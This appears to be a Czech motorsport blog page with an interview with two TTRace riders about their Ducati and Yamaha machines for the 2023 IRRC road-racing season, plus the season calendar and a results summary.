Lukáš: Jedná se o Ducati Panigale V2 955. Stejné motocykly můžete již druhým rokem vidět v mistrovství světa. Jedná se o novou generaci supersportů. Moje Kawasaki ZX-6R, se kterou jsem startoval minulou sezónu je také úžasný a rychlý stroj, postavený s nejlepších dílů, které jsou k dispozici. Chybí jen pilot. 🙂 Jedná se o naprosto spolehlivý stroj a určitě bude připraven v záloze. Nicméně koncepce je starší a do budoucna se bude potřeba dívat dál. Vím, že nás s Ducati čeká ještě spousta práce, připravujeme ještě druhý stroj, který bude řešen trochu jinak. Musíme nyní sbírat data, následně budeme vybírat vhodnější technická řešení.

Pavel: Říkáš druhý stroj, to není úplně levná a časově jednoduchá záležitost. Ducati budou v týmu tedy také dvě?

Lukáš: Jeden stroj bude pravděpodobně nabídnut k prodeji, protože jak říkáš, pořizovací cena a cena úprav, to není žádný med. Uvidíme, jak nám vše sedne, ale už teď víme, že se jedná o úžasně ovladatelný stroj, po kterém musí toužit každý jezdec. Nicméně vývoj v soukromých rukou je náročný a drahý, proto je pro případné zájemce nejlepší volbou koupit opravdu hotový a vyzkoušený stroj, než stavět motorku od základu. Ke spoustě závodních dílů se možná ani nemají šanci dostat.

Pavel: Tomu rozumím, ale ještě vím, že si sedlal také GSX-R 1000 poslední generace. Kde je motorka teď?

Lukáš: GSX-R je nyní k prodeji. Rád bych na tomto stroji jezdil, je to neskutečně silný stroj. Když jsem na GSX-R seděl poprvé v Dymokurech 2021, povedlo se mi hned zařadit časem na kolo mezi top 15 všech dob a to neumím jezdit 🙂 Výkonu tam máme hrozně, brzdy a řazení jsou také skvělé. Ale nebude na motorku čas, může dělat spoustu radosti někomu jinému. Někomu, kdo nechce být další jezdec na Yamaze, jako třeba můj kolega Jakub. Pozn. červeně: smějí se oba kluci.

Pavel: Lukáši díky, tím se přesunu k Jakubovi, ať se může bránit, ohledně výběru značky. Kubo, Jak se ty těšíš na sezónu IRRC?

Jakub: Ahoj Pavle, těším se a kdo by taky ne.😊 Vyzkoušet si nové tratě v jiných zemích a získat zkušenosti, které se dají získat jen samotným závoděním. Je to ovšem také obrovská výzva a velká zodpovědnost. Je potřeba 100% příprava jak mě tak motorky a samozřejmě celého našeho soukromého týmu.

Pavel: A jak probíhala příprava na tuto sezonu? 

Jakub: Samozřejmě fyzickou přípravou, jak tréninky v posilovně s osobním trenérem, tak trénink třeba na krosce. Přípravy se nevyhnuli ani motorce, na které probíhají motorické úpravy a ladění.

Pavel: Co je tedy cílem v této seźoně?

Jakub: Cílem je také odjet všechny závody v pořádku a dosažení bodového ohodnocení budu brát za splnění svých ambicí.

Pavel: Na jaký závod se těšíš nejvíce?

Jakub: Naše české Hořice, to je jasné. Věřím, že Hořice jsou srdcovka pro každého motorkáře v Čechách a pro závodníky obzvlášť. Velkou výzvou a zážitkem bude rozhodně i závod Imatra ve Finsku.

Pavel: Týmový kolega pojede na nové Ducati, proč zůstáváš u Yamahy? 

Jakub: U Yamahy zůstávám z důvodu srdeční záležitosti. Také se jedná osvědčenou techniku.

Pavel: Přesto jsme tě mohli před týdnem vidět na testování s týmem Yart, v chorvatské Rijece na motocyklu R1, kde byl i Karel Hanika. Ukážeš se někde i s tímto motocyklem, nebo jaké jsou další plány?

Jakub: Určitě ano, rád bych se ukázal s R1 na některých český závodech Roadracingu a okruzích. A příští rok odjet naplno sezonu s R1.

Pavel: Pánové, moc děkuji, budeme se těšit na Vaše počínání a držet Vám palce. Ještě doplním, že doplním, že první závod IRRC startuje 6.5.2023.

Lukáš, Jakub: Také děkujeme a budeme se těšit na všechny fanoušky.

Tým TTRace vstupuje do IRRC

- Komentáře nejsou povolené u textu s názvem Tým TTRace vstupuje do IRRC -

Nová sezóna se nezadržitelně blíží a s ní i nová pravidla, která ovlivní především prestižní kategorii Supersport (SSP) napříč národními i evropskými šámpionáty.

Evropský šampionát IRRC (International road racing championship) toho není výjimkou. Na přírodních tratích tak uvidíme nové motocykly: Triumph 765 Daytona, Kawasaki ZX-6R 636, MV Agusta F3 800 a Ducati V2 Panigale 955.

Právě poslední jmenovaný motocykl Ducati je horkou novinkou, kterou připravuje tým TTRACE (Factory racing). Na motocyklu pojede Lukáš Václavovič, kterého známe z českých road racingových tratí. Druhým pilotem je parťák Jakub Šprojcar, který však zůstává u klasiky, kterou je Yamaha YZF-R6. Bude tedy zajímavé sledovat tyto dvě naprosto odlišné koncepce v jednom týmu.

Lukáše i Jakuba uvidíme tedy v belgickém Chimay, na německém okruhu Schleiss , ve Finsku, Nizozemsku, v Hořicích a na závěr sezóny opět v Něměckém Frohburgu.

 • Round 1: Hengelo Gld (NLD)
  06-05-2023 – 07-05-2023
 • Round 2: Schleiz
  02-06-2023 – 04-06-2023
 • Round 3: Imatra (FIN)
  01-07-2023 – 02-07-2023
 • Round 4: Chimay (BEL)
  22-07-2023 – 23-07-2023
 • Round 5: Horice (CZE)
  12-08-2023 – 13-08-2023
 • Round 6: Frohburg (GER)
  16-09-2023 – 17-09-2023

Je zajímavostí, že oba jmenovaní piloti vedou i českou značku TTRace, vyrábějící motocyklové kombinézy. Je to možná poprvé, kdy uvidíme výrobce oblečení a doplňků pro závodníky i motorkáře v takto prestižním šampionátu. Uvidíme tak nejen nové stroje, ale určitě i nový design velmi pěkných kombinéz TT Race.

Kluci nám v rychlosti řekli i pár slov o přípravě a pocitech před zahájením závodů. Více se dočtete v následujícím článku.

Zde si můžete prohlédnout nové stroje pro sezonu 2023.

autor: biker07

Výsledkový servis z první poloviny road racingových závodů

Sezónu máme v polovině, proto Vám přinášíme shrnutí obou road racingových šampionátů. Protože jsou pořádající asociace dvě (Autoklub ČR a Cams) nemusí být dohledání výsledků pro běžného fanouška, či diváka úplně jednoduché. To jakým způsobem orginázátoři prezentují, nebo spíše neprezentují výsledky jednotlivých kategorií (především pak autoklub ČŘ), kde k dněšnímu dni nejsou k vidění kompletní výsledky dva měsíce starých závodů je opravdu námět k zamyšlení. Ale zpět ke sportovním výkonům.

Prvním závodem, kde se okruhová i road racingová špička schází, je tradičně Jarní cena Brna. Letos se podnik jel v rámci AČR i AlpeAdria i přírodních okruhů. Bohužel více licencí, znamenalo více zmatků a tak berte prezentované výsledky s velkou rezervou. Protože někteří jezdci nebyli autoklubem k dnešnímu dni započítáni do výsledků. Další závody jsou již, co se přehlednosti výsledků týká bezproblémové.

Naši jezdci Jakub Šprojcar a Lukáš Václavovič bodovali kromě premiérových Hořic v každém závodě. Lukáš se dokonce vždy
umístil v top 10. Další výsledky Vám přinese tentokrát ihned po dalším závodě.

Hlavní partneři: Autodoprava NH – Aleš Hetzer, Agentura 4PRO, TTRACE

Další partneři: DS Delta, Covermont, Titax, Gulf oil – L. Šedivý, Motozem

Stránky:1234567»